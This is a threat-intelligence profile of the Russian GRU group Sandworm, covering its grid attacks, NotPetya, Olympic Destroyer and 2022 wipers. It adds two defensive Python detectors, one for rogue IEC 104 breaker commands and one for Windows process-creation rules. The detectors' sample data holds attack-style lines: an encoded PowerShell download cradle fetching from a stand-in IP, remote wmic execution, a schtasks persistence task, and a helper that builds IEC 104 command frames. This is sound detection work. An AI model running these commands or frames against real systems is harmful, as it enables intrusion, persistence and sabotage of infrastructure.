Sandworm
Executive Summary
Sandworm is a Russian state-sponsored threat actor attributed to GRU Unit 74455, the Main Centre for Special Technologies (GTsST) of the Russian military intelligence service. Active since at least 2009, the group is one of the most destructive cyber threat actors documented to date. Sandworm conducts operations ranging from strategic espionage to large-scale destructive attacks against critical infrastructure, with a sustained operational focus on Ukraine.
The group is responsible for the first confirmed cyberattacks against electrical power grids (Ukraine, 2015 and 2016), the NotPetya global wiper attack (2017) that caused an estimated $10 billion in damages, the Olympic Destroyer attack against the 2018 Pyeongchang Winter Olympics, and multiple destructive operations during Russia’s 2022 invasion of Ukraine. Sandworm’s readiness to deploy destructive capabilities against civilian infrastructure sets it apart from other state-sponsored groups.
Notable Campaigns
2015 — Ukraine Power Grid Attack (BlackEnergy3)
On December 23, 2015, Sandworm carried out the first confirmed cyberattack to cause a power outage. The group gained its foothold in three Ukrainian regional distribution companies (oblenergos) through spearphishing that delivered BlackEnergy3, harvested credentials, and reached the SCADA networks over the utilities' own remote-access channels. Operators then manually opened circuit breakers from the hijacked HMIs, cutting power to approximately 225,000 customers for between one and six hours, and ran KillDisk against operator workstations to slow recovery.
2016 — Ukraine Power Grid Attack (Industroyer/CrashOverride)
On December 17, 2016, Sandworm deployed Industroyer (CrashOverride), a modular ICS-specific malware framework, against a Ukrenergo transmission substation north of Kyiv, cutting power to part of the city for about an hour. Industroyer spoke the substation protocols directly (IEC 60870-5-101, IEC 60870-5-104, IEC 61850 and OPC DA) to open circuit breakers, and also carried a denial-of-service module against Siemens SIPROTEC protection relays and a wiper to hinder restoration. It marked the shift from manual SCADA manipulation to automated, protocol-level ICS attack.
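The protocol-level behaviour described above is what a substation network monitor has to catch: control-direction ASDUs arriving from a host that is not the SCADA master, and one host walking through many information object addresses in sequence. The following is an added example, not code from Industroyer, Ukrenergo or any vendor: a minimal IEC 60870-5-104 APDU parser with two detection rules over a constructed capture. The master allowlist, the sweep threshold of five IOAs, and all addresses and frames are assumptions made for the example.

```python
"""Detector for Industroyer-style IEC 60870-5-104 control traffic.

Added example, not code from Sandworm, Industroyer or any vendor. It parses raw
IEC 104 APDUs, decodes single/double command ASDUs and flags (a) control commands
from a host that is not a listed SCADA master and (b) a host executing commands
across many information object addresses (IOAs), the sweep pattern Industroyer's
104 module used. The sample frames below are constructed for this example.
"""
import struct
from collections import defaultdict

# ASDU type identifiers for control commands (IEC 60870-5-101 / -104).
CONTROL_TYPES = {45: "C_SC_NA_1", 46: "C_DC_NA_1", 47: "C_RC_NA_1",
                 58: "C_SC_TA_1", 59: "C_DC_TA_1"}
# Size of the information element that follows the 3-byte IOA: one qualifier
# octet (SCO/DCO/RCO), plus a 7-byte CP56Time2a tag for the time-tagged variants.
ELEMENT_SIZE = {45: 1, 46: 1, 47: 1, 58: 8, 59: 8}


def parse_apdu(raw):
    """Parse one APDU. Returns None for S/U-format frames (no ASDU), a dict otherwise."""
    if len(raw) < 6 or raw[0] != 0x68 or raw[1] != len(raw) - 2:
        raise ValueError("malformed APDU")
    if raw[2] & 0x01:                       # control octet 1 bit 0 set: S- or U-format
        return None
    asdu = raw[6:]                          # skip start byte, length and 4 APCI octets
    if len(asdu) < 6:
        raise ValueError("truncated ASDU header")
    type_id, vsq = asdu[0], asdu[1]
    sq, count = bool(vsq & 0x80), vsq & 0x7F
    cot = asdu[2] & 0x3F                    # cause of transmission (6 = activation)
    common_addr = struct.unpack_from("<H", asdu, 4)[0]
    result = {"type": type_id, "cot": cot, "ca": common_addr, "objects": []}
    elem = ELEMENT_SIZE.get(type_id)
    if elem is None:                        # monitoring-direction ASDU: not decoded further
        return result
    pos, ioa = 6, None
    for i in range(count):
        if not sq or i == 0:                # SQ=1: one IOA, elements at consecutive addresses
            ioa = int.from_bytes(asdu[pos:pos + 3], "little")
            pos += 3
        else:
            ioa += 1
        if pos + elem > len(asdu):
            raise ValueError("truncated information object")
        qualifier = asdu[pos]               # SCO: bit0 = SCS (1 on); DCO: bits0-1 = DCS (1 off, 2 on)
        pos += elem
        result["objects"].append({"ioa": ioa, "select": bool(qualifier & 0x80),
                                  "state": qualifier & 0x03})
    return result


def build_command(type_id, ioa, qualifier, common_addr=1, cot=6):
    """Build an I-format APDU carrying one command object (sequence numbers zeroed)."""
    asdu = (bytes([type_id, 0x01, cot, 0x00]) + struct.pack("<H", common_addr)
            + ioa.to_bytes(3, "little") + bytes([qualifier]))
    body = bytes(4) + asdu
    return bytes([0x68, len(body)]) + body


def detect(frames, allowed_masters, sweep_threshold=5):
    """frames: iterable of (src_ip, apdu_bytes). Returns a list of alert dicts."""
    alerts, executed = [], defaultdict(set)
    for src, raw in frames:
        asdu = parse_apdu(raw)
        if asdu is None or asdu["type"] not in CONTROL_TYPES:
            continue
        name = CONTROL_TYPES[asdu["type"]]
        for obj in asdu["objects"]:
            if src not in allowed_masters:
                alerts.append({"rule": "control-from-unlisted-master", "src": src,
                               "asdu": name, "ioa": obj["ioa"], "state": obj["state"]})
            if not obj["select"]:           # execute step of select-before-operate, or direct execute
                executed[src].add(obj["ioa"])
    for src, ioas in executed.items():
        if len(ioas) >= sweep_threshold:
            alerts.append({"rule": "ioa-sweep", "src": src, "asdu": None,
                           "ioa": sorted(ioas), "state": None})
    return alerts


# Constructed sample capture: one legitimate HMI command, an RTU spontaneous
# measurement and an S-format acknowledgement, then a rogue host driving eight
# breakers (double command OFF, execute) in sequence.
ALLOWED_MASTERS = {"10.0.0.5"}
SAMPLE_FRAMES = [
    ("10.0.0.5", build_command(45, 1000, 0x01)),                          # C_SC_NA_1 ON, execute
    ("10.0.0.20", bytes.fromhex("680e00000000010103000100e8030001")),    # M_SP_NA_1, IOA 1000
    ("10.0.0.20", bytes.fromhex("680401000200")),                         # S-format ack, no ASDU
] + [("10.0.0.99", build_command(46, ioa, 0x01)) for ioa in range(1001, 1009)]

if __name__ == "__main__":
    for alert in detect(SAMPLE_FRAMES, ALLOWED_MASTERS):
        print(alert)
```

Against the constructed capture the detector raises eight unlisted-master alerts for 10.0.0.99 plus one IOA-sweep alert; the HMI's single command and the RTU's monitoring traffic raise nothing. In a real deployment the allowlist would come from the substation's engineering documentation, and the sweep rule would be applied per time window rather than per capture.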
2017 — NotPetya Global Destructive Attack
On June 27, 2017, Sandworm released the NotPetya wiper through a supply chain compromise of M.E.Doc, a Ukrainian tax accounting application, delivering the payload as a malicious software update. Inside victim networks it spread using the SMBv1 exploits EternalBlue and EternalRomance (CVE-2017-0144 and CVE-2017-0145) and credentials harvested with a Mimikatz-derived tool, which it reused over WMI and a bundled PsExec to reach fully patched hosts; this propagation carried it far beyond Ukraine. Estimated damages of about $10 billion fell on organizations including Maersk, Merck, FedEx/TNT Express, and Mondelez. Although it presented a ransom note, the installation ID it displayed was random data with no relation to the encryption key, so no decryption was possible.
2018 — Olympic Destroyer
On February 9, 2018, Sandworm deployed Olympic Destroyer against the IT infrastructure supporting the opening ceremony of the 2018 Pyeongchang Winter Olympics, disrupting stadium Wi-Fi, ticketing systems, and the official Olympics website. The malware carried deliberate false flags, including code artifacts mimicking Lazarus Group (North Korea) and Chinese APT tooling, designed to mislead attribution; the contradictory indicators were later shown to have been planted.
2022 — AcidRain and Wiper Campaign
On February 24, 2022, as Russian forces crossed into Ukraine, the AcidRain wiper bricked Viasat KA-SAT modems, cutting satellite communications for Ukrainian users and causing collateral outages elsewhere in Europe, including the loss of remote monitoring for thousands of German wind turbines. Through 2022, wipers including HermeticWiper, IsaacWiper and CaddyWiper struck Ukrainian government and infrastructure networks; in April 2022 CaddyWiper was deployed alongside Industroyer2, an IEC 104-only successor to the 2016 framework, against a Ukrainian high-voltage substation. Attribution of the individual wipers to Sandworm ranges from firm (CaddyWiper, Industroyer2) to medium confidence (HermeticWiper).
Technical Capabilities
Sandworm maintains advanced capabilities across both IT and operational technology (OT) environments. The group develops custom ICS-targeting malware, notably Industroyer/CrashOverride, whose payload modules each implement one industrial protocol (IEC 101, IEC 104, IEC 61850, OPC DA) and can be selected for a given target. BlackEnergy evolved through three major versions, from a 2007 DDoS toolkit to a modular espionage and network-access platform; BlackEnergy3 supplied the foothold for the 2015 grid attack, while the breaker manipulation itself was done by hand and the disk wiping by KillDisk.
The group's IT-focused tools include destructive malware (NotPetya, Olympic Destroyer, CaddyWiper), supply chain compromise techniques, and exploitation of network infrastructure. Cyclops Blink, disclosed jointly by NCSC, CISA, FBI and NSA in February 2022, was a modular Linux botnet framework that persisted on WatchGuard Firebox firewalls (and later ASUS routers) by modifying legitimate firmware update images; it replaced the VPNFilter botnet the FBI had disrupted in 2018 and was itself taken down by an FBI operation in April 2022.
Sandworm employs advanced operational security including false flag techniques (Olympic Destroyer contained code artifacts intended to mislead attribution), living-off-the-land techniques, and multi-stage attack chains combining IT network compromise with OT-specific payloads.
Attribution
On October 19, 2020, the U.S. Department of Justice indicted six GRU officers of Unit 74455, charging them with the 2015 and 2016 Ukraine grid attacks, NotPetya, Olympic Destroyer, the 2017 French presidential election hack-and-leak, spearphishing of the OPCW investigation into the Novichok poisonings, and the 2019 attacks on Georgian companies and government entities. The indictment identified the defendants as officers of the GTsST.
CISA advisory AA22-110A (April 20, 2022), issued jointly with Five Eyes partners, lists Sandworm/GTsST among the Russian state-sponsored actors targeting critical infrastructure. Private-sector research from ESET, Mandiant, Dragos, and Microsoft independently tracks the group's infrastructure, malware lineage (BlackEnergy to Industroyer to Industroyer2, VPNFilter to Cyclops Blink), and operational timelines, and its targeting is consistent with Russian strategic military objectives.
MITRE ATT&CK Profile
Initial Access: Sandworm uses spearphishing (T1566), supply chain compromise (T1195.002), and exploitation of public-facing applications (T1190) including VPN appliances and web servers.
Execution: The group leverages PowerShell (T1059.001), Windows Management Instrumentation (T1047), and custom loaders. ICS-specific tools directly manipulate industrial protocols.
Persistence: Scheduled tasks (T1053), web shells (T1505.003), and firmware-level implants on network devices (Cyclops Blink) maintain access.
Impact: Sandworm's hallmark is destructive impact through data destruction (T1485), disk wiping (T1561), and manipulation of industrial control systems. NotPetya overwrote the MBR with its own bootloader, encrypted the MFT on reboot, and encrypted user files, while displaying an installation ID that was random data rather than a function of the key, so the ransom note was a cover for an unrecoverable wipe.
Defense Evasion: False flag operations (Olympic Destroyer), timestomping, indicator removal, and process injection complicate attribution and evade detection.
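The execution and persistence techniques in this profile (remote WMI process creation, encoded PowerShell, scheduled task creation, web shells) all surface in process-creation telemetry. The following is an added example, not a rule set from MITRE, CISA or any vendor: a handful of rules over Sysmon Event ID 1 / Security 4688-style records, run on constructed sample events. The field names, hostnames, the 198.51.100.7 address and the sample command lines are assumptions made for the example.

```python
"""Process-creation rules for the Sandworm execution and persistence TTPs listed above.

Added example, not a rule set from MITRE, CISA or any vendor. Records mimic
Sysmon Event ID 1 / Security 4688 fields (image, parent image, command line);
the sample events, hostnames and the 198.51.100.7 address are constructed for
this example. Each rule returns the ATT&CK ID it covers.
"""
import base64
import re

REMOTE_WMI_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe"}
WEB_SERVER_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat.exe"}
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(rec):
    """Return [(technique_id, reason), ...] for one process-creation record."""
    image, parent, cmd = basename(rec["image"]), basename(rec["parent_image"]), rec["command_line"]
    hits = []
    # T1047: remote WMI process creation. On the source host wmic.exe targets /node:;
    # on the target host the child is spawned by the WMI provider host.
    if image == "wmic.exe" and re.search(r"/node:\S+.*\bprocess\s+call\s+create\b", cmd, re.I):
        hits.append(("T1047", "wmic remote process creation"))
    if parent == "wmiprvse.exe" and image in REMOTE_WMI_CHILDREN:
        hits.append(("T1047", f"{image} spawned by WmiPrvSE.exe"))
    # T1059.001: PowerShell with an encoded command; decode it so the alert shows intent.
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append(("T1059.001", "encoded PowerShell: " + decoded[:60]))
    # T1053.005: scheduled task creation from the command line.
    if image == "schtasks.exe" and re.search(r"(?:^|\s)/create\b", cmd, re.I):
        hits.append(("T1053.005", "schtasks /create"))
    # T1505.003: web shell, seen as a web server worker launching a shell.
    if parent in WEB_SERVER_WORKERS and image in ("cmd.exe", "powershell.exe"):
        hits.append(("T1505.003", f"{image} spawned by {parent}"))
    return hits


def run(records):
    """Return [(record_index, technique_id, reason), ...] across a batch of records."""
    return [(i, tech, why) for i, rec in enumerate(records) for tech, why in classify(rec)]


# Constructed sample events (not real telemetry).
PLAINTEXT_PS = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
ENCODED_PS = base64.b64encode(PLAINTEXT_PS.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "notepad.exe"},
    {"host": "ws01", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'wmic /node:"10.0.0.12" /user:"corp\admin" process call create "cmd.exe /c whoami"'},
    {"host": "srv02", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "command_line": "cmd.exe /c whoami"},
    {"host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + ENCODED_PS},
    {"host": "ws01", "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'schtasks /create /tn "Updater" /tr "C:\Users\Public\u.exe" /sc onlogon'},
    {"host": "web01", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe", "command_line": "cmd.exe /c whoami"},
    {"host": "srv02", "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe", "command_line": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for idx, tech, why in run(SAMPLE_EVENTS):
        print(SAMPLE_EVENTS[idx]["host"], tech, why)
```

Five of the seven constructed events fire, one technique each; the two benign records (notepad under explorer, svchost under services) stay quiet. Decoding the PowerShell payload instead of merely flagging the `-enc` switch is the part worth keeping: it lets a triage rule distinguish an administrator's encoded one-liner from a download cradle without a second query.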
Sources & References
- MITRE ATT&CK: Sandworm Team — MITRE ATT&CK
- CISA: Advisory AA22-110A — CISA, 2022-04-20
- US DOJ: Six Russian GRU Officers Charged — US Department of Justice, 2020-10-19
- Mandiant: Sandworm Disrupts Power in Ukraine — Mandiant, 2023-11-09
- ESET: TeleBots Supply Chain Attacks Against Ukraine — ESET, 2017-06-30